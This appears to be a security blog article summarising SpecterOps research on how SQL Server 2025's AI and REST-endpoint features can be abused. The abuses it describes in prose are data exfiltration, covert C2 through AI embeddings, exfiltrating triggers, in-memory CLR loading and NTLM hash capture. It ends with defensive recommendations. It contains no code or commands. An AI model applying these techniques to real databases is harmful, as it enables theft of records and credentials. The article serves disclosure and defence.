Overview
Microsoft’s SQL Server 2025 was designed to bring AI into enterprise databases — but research from SpecterOps shows that these same features can be weaponized for data exfiltration and command‑and‑control (C2) operations. The findings reveal how legitimate AI functions can be repurposed by attackers to steal data and establish persistent backdoors without deploying traditional malware.
How Attackers Exploit SQL Server AI Features
At the core of the research is the stored procedure sp_invoke_external_rest_endpoint, which allows SQL Server to send HTTPS requests to external endpoints directly from the database engine. Originally intended for API integration, this feature can be abused to exfiltrate sensitive data over encrypted channels.
| Feature | Legitimate Purpose | Abuse Scenario |
|---|---|---|
| sp_invoke_external_rest_endpoint | Enables secure API calls from SQL Server | Sends data to attacker‑controlled servers via HTTPS |
| CREATE EXTERNAL MODEL | Integrates AI models for RAG workloads | Establishes covert C2 channels through AI embeddings |
| AI_GENERATE_EMBEDDINGS | Generates structured AI responses | Encodes commands and responses within AI traffic |
Because the traffic originates from the database engine and uses HTTPS, it can bypass traditional security tools that monitor for PowerShell or xp_cmdshell execution.
Real‑World Attack Scenarios
SpecterOps demonstrated how a compromised SQL Server instance with sysadmin privileges can query sensitive tables, convert data to JSON, and transmit it to an external server using the REST endpoint procedure.
Attackers can also use AI model calls to create persistent C2 channels:
- Encode commands within AI embedding data to make traffic appear legitimate.
- Periodically check in with external models to receive instructions and return results.
- Load malicious .NET CLR assemblies directly into memory to avoid disk‑based payloads.
In advanced cases, attackers can abuse UNC paths in AI model configurations to trigger NTLM authentication attempts over SMB, capturing or relaying hashes within the network. Microsoft did not classify this behavior as a vulnerability, leaving it exploitable in current deployments.
Persistence and Continuous Data Leakage
Attackers can create database triggers that automatically exfiltrate newly inserted or updated records. For example, any new user credentials added to a table can be instantly sent to an external server — turning the database into a continuous data leakage point.
This approach blurs the line between legitimate AI workloads and malicious activity, making traditional detection methods ineffective.
Defensive Recommendations
SpecterOps and security analysts recommend a multi‑layered defense strategy:
- Restrict Outbound Connections → Block database servers from initiating external HTTPS requests.
- Limit Sysadmin Privileges → Enforce least‑privilege access and audit privileged accounts.
- Monitor AI Integrations → Track usage of external REST endpoints and AI model calls.
- Baseline AI Traffic → Establish normal patterns to detect anomalies in AI workloads.
- Review CLR Assemblies → Identify unauthorized in‑memory modules or assemblies.
Expert in the Cloud Insight
SQL Server 2025 illustrates a new security paradox: innovation without corresponding controls expands the attack surface. As AI becomes embedded in enterprise software, defenders must adapt to a world where the database itself can communicate externally and execute AI‑driven logic.
For security leaders, the lesson is clear — treat AI features as networked components, not isolated functions. Apply the same rigor used for API security to AI integrations and monitor them as potential exfiltration channels.
Leave a Reply